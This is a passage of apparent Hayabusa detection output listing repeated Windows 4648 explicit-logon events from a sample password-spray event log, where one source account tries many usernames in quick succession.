DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: 